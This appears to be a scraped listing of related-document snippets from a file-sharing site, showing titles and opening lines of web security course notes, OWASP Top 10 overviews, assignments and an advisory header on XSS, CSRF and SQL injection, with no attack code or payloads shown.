Client Side Injection on Web Applications Client Side Injection on Web Applications Author: Milad Khoshdel Blog: https://blog.regux.com Email: miladkhoshdel@gmail.com 1 P a g e Contents INTRODUCTION... 3 HTML Injection Vulnerability... 4 How to

More information

CS 161 Computer Security

CS 161 Computer Security Paxson Spring 2017 CS 161 Computer Security Discussion 4 Week of February 13, 2017 Question 1 Clickjacking (5 min) Watch the following video: https://www.youtube.com/watch?v=sw8ch-m3n8m Question 2 Session

More information

OWASP Top 10 The Ten Most Critical Web Application Security Risks

OWASP Top 10 The Ten Most Critical Web Application Security Risks OWASP Top 10 The Ten Most Critical Web Application Security Risks The Open Web Application Security Project (OWASP) is an open community dedicated to enabling organizations to develop, purchase, and maintain

More information

HTML5 a clear & present danger

HTML5 a clear & present danger HTML5 a clear & present danger Renaud Bidou CTO 1/29/2014 Deny All 2012 1 1/29/2014 Deny All 2013 1 Menu 1. HTML5 new capabilities 2. HTML5 tricks 3. Empowering common threats 4. Hackers dreams come true

More information

Web 2.0 and AJAX Security. OWASP Montgomery. August 21 st, 2007

Web 2.0 and AJAX Security. OWASP Montgomery. August 21 st, 2007 Web 2.0 and AJAX Security OWASP Montgomery August 21 st, 2007 Overview Introduction Definition of Web 2.0 Basics of AJAX Attack Vectors for AJAX Applications AJAX and Application Security Conclusions 1

More information

Black Box DCX3000 / DCX1000 Using the API

Black Box DCX3000 / DCX1000 Using the API Black Box DCX3000 / DCX1000 Using the API updated 2/22/2017 This document will give you a brief overview of how to access the DCX3000 / DCX1000 API and how you can interact with it using an online tool.

More information

Solutions Business Manager Web Application Security Assessment

Solutions Business Manager Web Application Security Assessment White Paper Solutions Business Manager Solutions Business Manager 11.3.1 Web Application Security Assessment Table of Contents Micro Focus Takes Security Seriously... 1 Solutions Business Manager Security

More information

CSCD 303 Essential Computer Security Fall 2018

CSCD 303 Essential Computer Security Fall 2018 CSCD 303 Essential Computer Security Fall 2018 Lecture 17 XSS, SQL Injection and CRSF Reading: See links - End of Slides Overview Idea of XSS, CSRF and SQL injection is to violate security of Web Browser/Server

More information

Attacks Against Websites. Tom Chothia Computer Security, Lecture 11

Attacks Against Websites. Tom Chothia Computer Security, Lecture 11 Attacks Against Websites Tom Chothia Computer Security, Lecture 11 A typical web set up TLS Server HTTP GET cookie Client HTML HTTP file HTML PHP process Display PHP SQL Typical Web Setup HTTP website:

More information

CIS 4360 Secure Computer Systems XSS

CIS 4360 Secure Computer Systems XSS CIS 4360 Secure Computer Systems XSS Professor Qiang Zeng Spring 2017 Some slides are adapted from the web pages by Kallin and Valbuena Previous Class Two important criteria to evaluate an Intrusion Detection

More information

The HTTP protocol. Fulvio Corno, Dario Bonino. 08/10/09 http 1

The HTTP protocol. Fulvio Corno, Dario Bonino. 08/10/09 http 1 The HTTP protocol Fulvio Corno, Dario Bonino 08/10/09 http 1 What is HTTP? HTTP stands for Hypertext Transfer Protocol It is the network protocol used to delivery virtually all data over the WWW: Images

More information

Vulnerabilities in web applications

Vulnerabilities in web applications Vulnerabilities in web applications Web = Client + Server Client (browser) request HTTP response Server HTTP request contains the URL of the resource and the header HTTP response contains a status code,

More information

Information Security CS 526 Topic 11

Information Security CS 526 Topic 11 Information Security CS 526 Topic 11 Web Security Part 1 1 Readings for This Lecture Wikipedia HTTP Cookie Same Origin Policy Cross Site Scripting Cross Site Request Forgery 2 Background Many sensitive

More information

CSE361 Web Security. Attacks against the client-side of web applications. Nick Nikiforakis

CSE361 Web Security. Attacks against the client-side of web applications. Nick Nikiforakis CSE361 Web Security Attacks against the client-side of web applications Nick Nikiforakis nick@cs.stonybrook.edu Despite the same origin policy Many things can go wrong at the client-side of a web application

More information

CS144 Notes: Web Standards

CS144 Notes: Web Standards CS144 Notes: Web Standards Basic interaction Example: http://www.youtube.com - Q: what is going on behind the scene? * Q: What entities are involved in this interaction? * Q: What is the role of each entity?

More information

Project 2: Web Security

Project 2: Web Security EECS 388 September 30, 2016 Intro to Computer Security Project 2: Web Security Project 2: Web Security This project is due on Thursday, October 13 at 6 p.m. and counts for 8% of your course grade. Late

More information

Welcome to the OWASP TOP 10

Welcome to the OWASP TOP 10 Welcome to the OWASP TOP 10 Secure Development for Java Developers Dominik Schadow 03/20/2012 BASEL BERN LAUSANNE ZÜRICH DÜSSELDORF FRANKFURT A.M. FREIBURG I.BR. HAMBURG MÜNCHEN STUTTGART WIEN 1 AGENDA

More information

LAMP, WEB ARCHITECTURE, AND HTTP

LAMP, WEB ARCHITECTURE, AND HTTP CS 418 Web Programming Spring 2013 LAMP, WEB ARCHITECTURE, AND HTTP SCOTT G. AINSWORTH http://www.cs.odu.edu/~sainswor/cs418-s13/ 2 OUTLINE Assigned Reading Chapter 1 Configuring Your Installation pgs.

More information

Lecture 9. Forms & APIs 1 / 38

Lecture 9. Forms & APIs 1 / 38 Lecture 9 Forms & APIs 1 / 38 Final Project Proposal Due November 12th 11:59PM Should include: A summary of your idea A diagram with the db tables you plan to use& the relationships between them You can

More information

CSCD 303 Essential Computer Security Fall 2017

CSCD 303 Essential Computer Security Fall 2017 CSCD 303 Essential Computer Security Fall 2017 Lecture 18a XSS, SQL Injection and CRSF Reading: See links - End of Slides Overview Idea of XSS, CSRF and SQL injection is to violate the security of the

More information

Cross-Site Request Forgery: The Sleeping Giant. Jeremiah Grossman Founder and CTO, WhiteHat Security

Cross-Site Request Forgery: The Sleeping Giant. Jeremiah Grossman Founder and CTO, WhiteHat Security Cross-Site Request Forgery: The Sleeping Giant Jeremiah Grossman Founder and CTO, WhiteHat Security Cross-Site Request Forgeries (CSRF) 1. Session Riding 2. Client-Side Trojans 3. Confused Deputy 4. Web

More information

Robust Defenses for Cross-Site Request Forgery Review

Robust Defenses for Cross-Site Request Forgery Review Robust Defenses for Cross-Site Request Forgery Review Network Security Instructor:Dr. Shishir Nagaraja Submitted By: Jyoti Leeka October 16, 2011 1 Introduction to the topic and the reason for the topic

More information

Provide you with a quick introduction to web application security Increase you awareness and knowledge of security in general Show you that any

Provide you with a quick introduction to web application security Increase you awareness and knowledge of security in general Show you that any OWASP Top 10 Provide you with a quick introduction to web application security Increase you awareness and knowledge of security in general Show you that any tester can (and should) do security testing

More information

Ruby on Rails Secure Coding Recommendations

Ruby on Rails Secure Coding Recommendations Introduction Altius IT s list of Ruby on Rails Secure Coding Recommendations is based upon security best practices. This list may not be complete and Altius IT recommends this list be augmented with additional

More information

CSWAE Certified Secure Web Application Engineer

CSWAE Certified Secure Web Application Engineer CSWAE Certified Secure Web Application Engineer Overview Organizations and governments fall victim to internet based attacks every day. In many cases, web attacks could be thwarted but hackers, organized

More information

Security. CSC309 TA: Sukwon Oh

Security. CSC309 TA: Sukwon Oh Security CSC309 TA: Sukwon Oh Outline SQL Injection NoSQL Injection (MongoDB) Same Origin Policy XSSI XSS CSRF (XSRF) SQL Injection What is SQLI? Malicious user input is injected into SQL statements and

More information

CS 142 Winter Session Management. Dan Boneh

CS 142 Winter Session Management. Dan Boneh CS 142 Winter 2009 Session Management Dan Boneh Sessions A sequence of requests and responses from one browser to one (or more) sites Session can be long (Gmail - two weeks) or short without session mgmt:

More information

Web Security. Thierry Sans

Web Security. Thierry Sans Web Security Thierry Sans 1991 Sir Tim Berners-Lee Web Portals 2014 Customer Resources Managemen Accounting and Billing E-Health E-Learning Collaboration Content Management Social Networks Publishing Web

More information

Fortify Software Security Content 2017 Update 4 December 15, 2017

Fortify Software Security Content 2017 Update 4 December 15, 2017 Software Security Research Release Announcement Micro Focus Security Fortify Software Security Content 2017 Update 4 December 15, 2017 About Micro Focus Security Fortify SSR The Software Security Research

More information

Web Application Attacks

Web Application Attacks Web Application Attacks What can an attacker do and just how hard is it? By Damon P. Cortesi IOActive, Inc. Comprehensive Computer Security Services www.ioactive.com cortesi:~

More information

Penetration Testing. James Walden Northern Kentucky University

Penetration Testing. James Walden Northern Kentucky University Penetration Testing James Walden Northern Kentucky University Topics 1. What is Penetration Testing? 2. Rules of Engagement 3. Penetration Testing Process 4. Map the Application 5. Analyze the Application

More information

Introduc)on to Computer Networks

Introduc)on to Computer Networks Introduc)on to Computer Networks COSC 4377 Lecture 3 Spring 2012 January 25, 2012 Announcements Four HW0 s)ll missing HW1 due this week Start working on HW2 and HW3 Re- assess if you found HW0/HW1 challenging

More information

Assignment 6: Web Security

Assignment 6: Web Security COS 432 November 20, 2017 Information Security Assignment 6: Web Security Assignment 6: Web Security This project is due on Monday, December 4 at 11:59 p.m.. Late submissions will be penalized by 10% per

More information

Abysssec Research. 1) Advisory information. 2) Vulnerability Information

Abysssec Research. 1) Advisory information. 2) Vulnerability Information Abysssec Research 1) Advisory information Title : Personal.Net Portal Multiple Vulnerabilities Affected : Personal.Net Portal Version 2.8.1 Discovery : www.abysssec.com Vendor : http://www.dotnet-portal.net/home.tab.aspx

More information

CSE 333 Lecture HTTP

CSE 333 Lecture HTTP CSE 333 Lecture 19 -- HTTP Hal Perkins Department of Computer Science & Engineering University of Washington Administrivia Server-side programming exercise due Wed. morning HW4 due a week later - How s

More information